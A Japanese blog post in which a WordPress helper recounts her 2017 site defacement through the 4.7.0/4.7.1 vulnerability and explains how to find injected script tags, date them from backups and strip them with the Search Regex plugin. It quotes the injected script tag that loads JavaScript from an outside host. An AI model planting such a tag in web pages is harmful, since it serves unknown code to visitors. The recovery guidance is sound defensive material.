The following two tabs change content below.
小澤朋子
現在、初心者のためのワードプレス・スタートアップアドバイザーとして活動中!ワードプレスの導入・設定でお困りの、あなたのための、お手伝いをしています!本格的にネットで集客をお考えのあなたのためのサービスです。また、時間や場所に捕らわれない「ノマドライフ」を堪能する日々を送っています(^-^)/メール:info@triz-web.com

ワードプレス(4.7.0・4.7.1)に脆弱性(セキュリティーホール)が見つかったというニュースにびっくりした@「ノマド」な主婦Toroです。

以前からワードプレスの改ざん問題はありましたが、結構大きく取り上げられていたので注意が必要ですね!

私がそのニュースを知ったのは2017年2月7日の朝のラジオでした。

へーえー。と他人事でした。(あるあるなので。)

ただ、こんなマイナーな(ちょっと失礼)ラジオなどのニュースで取り上げられるとは!

と思ったので、メルマガ読者の方やFACEBOOKで、一斉送信してお知らせしました。

しかも、私がみなさんへ、気をつけてくださいね~~。

なんて言っているにも関わらず~。

そんな私のサイトが既に、 魔の手に落ちていることも知らず(-_-;)

あんたのサイトが乗っ取られたんかい!!

と、突っ込みが入るレベルですね(-_-;)

その魔の手に気がついたのは2017年2月9日でした。

しかし、私の改ざんの被害にあったのは、事業内容しか使われていないドメインサイト(トライズウェブ)でした。

そして、被害があった箇所は、投稿ページの下書きとなっているページだったということ。

初期段階では、初心者や、あまり改ざんに関して知らない人には、気がつかれないのでは?

と思うような改ざん施策(scriptの埋め込み)でした。

私と同じような状態となっている人との共有とともに、改ざんチェック方法や症状・その復旧に至るまでの方法をお伝えします!

シロクマ先生
もしかして、あなたのワードプレスは既に魔の手に。。
スポンサーリンク

改ざんされていたサイトの特徴

今回の改ざんの発覚は偶然見つかった。

何を隠そう、このブログ「Toroノマド」のワードプレスの更新・メンテは定期的にしています。

ところが、ドメインに設置してある別のワードプレス(triz-web.com)は、ほとんど触れていない。

更新もしていない。

ほったらかし状態。

そのため、手動でアップデートするタイミング以外管理画面に入ることもない

早い話、メンテナンスを怠っているサイトのようなものです(-_-;)

そのため、セキュリティ用のプラグインも設置されておらず。。

というような、メインドメインのお粗末サイトを、そろそろテコ入れをしようと思っていた所だったんです。

そのタイミングが2017/1/29でした。
※この時点で4.7.1のワードプレスの脆弱性について全く知らない状態。

この時点で、テコ入れ=テーマを変更し、4.7.2へアップデートまでしていました。

そもそも、メインドメインのサイト(トライズウェブ)では、もともとの記事数が少ないことが特徴です。

trizweb

  • 記事数:8ページ(下書き4ページ)
  • 固定ページ:3ページ

要するに、事業内容と、簡単なサービス内容くらいしか用意していないかったサイトです。

テコ入れし始めた1/29時点では、サイト内の文章や全体的な流れを変更している時、実は違和感を少し感じていました。

しかし、初めて使用するテーマだし、ワードプレスもアップロードしたから?

と、その違和感をワードプレスのアップデート新しいテーマのため、だと勝手に推測していました。

ここで、知っておいて欲しい、4.7.2へのアップデートで大き変わった所です。

アップデート(4.7.2)で、<script>タグにマークが表示される

アップデートで問題となるのは、4.6二番目の数字が4.7へなるレベルの場合は、手動でアップデートです。

今回のように、4.7.1⇒ 4.7.2へは、自動アップデートになるのに、今回は手動だったことに少し疑問を感じました。

ま、とりあえず上げておこうと思い、自分のサイトをアップデートしました。

はい、めでたし、めでたし。

とーこーろーがーー!

4.7.2へ上げた時にすでに、魔の手が及んでいたとはとは!

自分のサイトへ入り込んでいたとは!!

シロクマ先生
その一部始終をお伝えします。

みなさんは、自分の投稿記事内にjavascriptを入れたりしていますか?

一般的には、故意にアドセンスを貼る以外は、設置する人は少ないかと思います。

Googleアドセンスの広告のソースを記事内へ入れている人であれば、一目瞭然です。

<script async src=”//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js”></script>
<!– adsense –>
<ins class=”adsbygoogle”
style=”display:block”
data-ad-client=”00000000″
data-ad-slot=”aaaaaaaaaa”
data-ad-format=”auto”></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

例えば、まだ、4.7.1の場合

投稿編集の「テキスト」表示(4.7.1)

4-7-1b

 

投稿編集の「ビジュアルエディタ」表示(4.7.1)

4-7-1_ビジュアル

 

投稿編集の「ビジュアルエディタ」表示(4.7.2)

scriptマーク

このように、4.7.1 ⇒ 4.7.2 へアップデートを行うと、投稿記事内に<script>タグがある場合は、ビジュアルエディタで見るとすぐわかるようになりました。
※テーマにより表示されているマークは異なります。

これは、後で気がついたことですが。。

いま、思えば、最初に感じた違和感はそれだったのですよね。

基本的に、メインドメイン(トライズウェブ)のサイトには、scriptは使用していません

また、、この日(1/29)は、テーマの設定をして、コンテンツを他のサイトからコピペしただけなので、改ざんに気がつきませんでした。

シロクマ先生
この時、気付けなかったのは、
傲慢さかも知れない。。

ワードプレスアップデート前にはバックアップ

ニュースで知った2/7は単に、ブログ「Toroノマド」のアップデートのみで終わりました。

一応、アップデート前にはバックアップはしておきましょう!

とっても簡単!サーバー&DropBoxへ自動バックアップ!「BackWPup」

私は、バックアッププラグインは、「BackWPup」を使用しています。

自動バックアップ機能付きで、1週間に1度の自動設定にしています。

そのため、私の今までのバックアップデータは以下の通り。

日曜日の午前3時に設定されています。

  • 2017/2/7(手動
  • 2017/2/5(自動
  • 2017/1/29(自動
  • 2017/1/22(自動
  • 2017/1/15(自動

そして、改ざんと気がついたのは、2/9です。

改ざんされた埋め込みページはこうだ!

たまたま、Toroノマドのサービスページを模索中だったため、トライズウェブのサービスページへ移動し、表示させていました。

そして、リンク先が変更になったので、変更しようとしたら・・・。

そのページ内に、スクリプトマークだらけになっていました!!

ひえ~~~!!なんじゃこれ~~!

xss

こんなところに、<script>埋めるわけあらへんわー(静岡県民です。)

と、テキストエディタへ変更すると。。

HTMLタグがついている前に、必ずこの<sucript>タグが付いていることに気がつきました!

<script type=’text/javascript’ src=’http://js.trafficanalytics.online/js/js.js’></script>

xss-2

この状況で、実際のweb画面を見ても、特に変わりません。

しかし、scriptの数が異様に多いページは、ページを開くときに、毎回scriptのリンクへ行っているため、表示速度が非常に遅くなってしまいました。

こんな、小賢しいスクリプトとは、早くおさらばせねば!と思い、バックアップデータを、いつまで遡ればいいのか考えました。

とりあえず、直近の2/7にタイムスリップ。

はっきり言って、2/9と同様すべてのページにscriptマークがたくさんで、改ざんされている部分は同じ。

1/29は当時は気が付いていなかったが、もう一度、確認したら埋め込めれていた(この時点では固定ページの下書きのみ)

結局、1/22に遡ったら、改ざん被害はなかった

ということは、改ざんされたのは、1/22~1/29の間ということになる。。

ただ、1/29にテーマやら記事やらをいろいろ触っていたので、1/22の時点に戻るのは避けたかった。

そのため、1/29のデータであれば、固定ページの下書き記事しか被害はなかったので、除去作業をした

私の場合は、サイト内の記事数が少なく、チェックが簡単だからいいものの。。

もしも、Toroノマドが改ざん被害あっていたら、すべての記事をビジュアルエディタで、scriptマークを探さなければいけなかった。

という方のために、改ざん被害のチェック方法と除去方法をお伝えしていきます!

改ざん被害のチェック方法

IPA通信の画像です。

4.7.1と4.7.0に、セキュリティホールが見つかったため、だれでも、記事の内容を変更できる状態になったいた。

  • 4.7.0のアップデート公開日(2016/12/6)
  • 4.7.1のアップデート公開日(2017/1/11)
  • 4.7.2アップデート公開日(2017/1/26⇒ 2/1
  • ニュースで取り上げられた日(2017/2/6)
    >>IPA情報処理通信機構

アップデートの公開日は上記のとおりですが、あなたはいつ4.7.0へ手動で上げたかによって変わってきますね。

なぜなら、4.6では、セキュリティーホールは存在しておらず、安全でした。

4.7へ上げた人が脅威にさらされたということです!

なんてことでしょう(´;ω;`)

頻繁に、記事を書いている人とそうでない人がいますね。

頻繁(ほぼ毎日)の人は、改ざん症状の除去をお勧めします。

めったに記事の更新をされていないのであれば、単にバックアップデータを復元したほうが早そうですね。

とっても簡単!バックアップデータの復元方法「BackWPup」

もしも、被害にあった場合、この1ヶ月前後のデータを確認すればokです。

ほぼ毎日記事の更新されている人のための対処法

多くの被害は、記事内へ何者かがへんなscriptを付ける=記事の更新なので、最新更新日をチェックすればokです。

ところが、管理画面の固定ページや投稿ページ一覧には、公開日時しか表示されません。

ワードプレスのカスタマイズに慣れていない人は、ちょっと面倒かもしれません。

functions.phpにあるソースを追加するだけで、最新更新日が表示されるようになります。

こちら↓のサイトに詳しく載っています。(固定ページ&投稿ページ含め)

WordPressの管理画面で更新日一覧を出しソートする方法

そのソースを子テーマのfunctios.phpへコピペします。

最新更新日

そうすれば、一番右に「最終更新日」が表示されるようになり、昇順・降順でソートができます。

その時点で、公開日と、最終更新日が違い、1月から2月の更新日になっている記事が、改ざんの可能性大ですね!

下書きの記事なんて、全然触っていないのに、最終更新日が「2017/1/29PM5時○○」とは。。(-_-;)

必要ない記事もさっさと廃棄すべきなんですね。

被害状況をみてみましょう。

共通していたのは、共通した<script>タグが埋め込まれていた。

シロクマ先生
その<script>タグさえ削除すればいいのです!

改ざん症状のscriptタグを一瞬で消す方法

要するに、固定ページや投稿記事内に共通した「魔物」=「scriptタグでくくられているソース」を削除すればいいだけです。

方法はいくつかありますが、データベースでの処理は初心者の方には大変なので、ここはプラグインを使用します。

データベースの文字の置換が簡単にできるプラグイン「Search Regex」です。

serchregex

管理画面⇒ ツール ⇒ SerchRegexを開きます。

そして、「魔のスクリプト」を貼り付けます。

Replace Patternは、空白です。

serchregex2

どのくらいあるか、「Seach」でみてみましょう!

serch2

62件ヒットしたようです。

そいつらを除去するので、ボタン右の「Replace&Save」をクリックします。

シロクマ先生
魔物よ!消しされ!

改ざん結果(テキストエディタ)Before

xss-2

改ざん結果(テキストエディタ)after

after2

これで、魔のスクリプトは消え去りました。

シロクマ先生
最後に、ログインIDとパスワード変更してね!

まとめ

今回の改ざんは、まさか自分のサイトが!という、「ワードプレスの改ざんは突然に!」

シロクマ先生
♫あの日~。あの時、あの場所で~~♫
をお送りしました。

改ざんのチェックから除去と対策

  • 更新頻度が低いサイトを運営している。
  • セキュリティ系のプラグインがついていない。
  • ワードプレスバージョンが4.7.0か4.7.1である。

チェックのポイント

・4.7.2へアップデートしたら、アドセンスなんて、貼ってないのに、scriptマークが見つかる。

改ざん除去法

  • 4.7.2へアップデート
  • 共通の「魔のスクリプト」をプラグイン「Serch Regex」で一括置換して削除する。
  • 管理画面のID・パスワードの変更

おすすめプラグイン

Wordfence Security
>>使用法はこちらに詳しく載っていました

シロクマ先生
それにしても、他人事ではないんですね~

乗っ取られていたのは、私のメインドメインのtriz-web.comのサイトでした。

しかも、投稿ページの下書きにいるなんて~~。。

なので、皆さんが見ることのないページなのでご安心を。

また、既に駆除済みTRiz-Web(トライズウェブ)なので見に来てくださいね!

今回のケース以外にもまだ、他にもきっと事例がありそうですね。

シロクマ先生
もしかしたら皆さんにも気がつかないうちに悪魔の手が入ってるかもしれませんよ!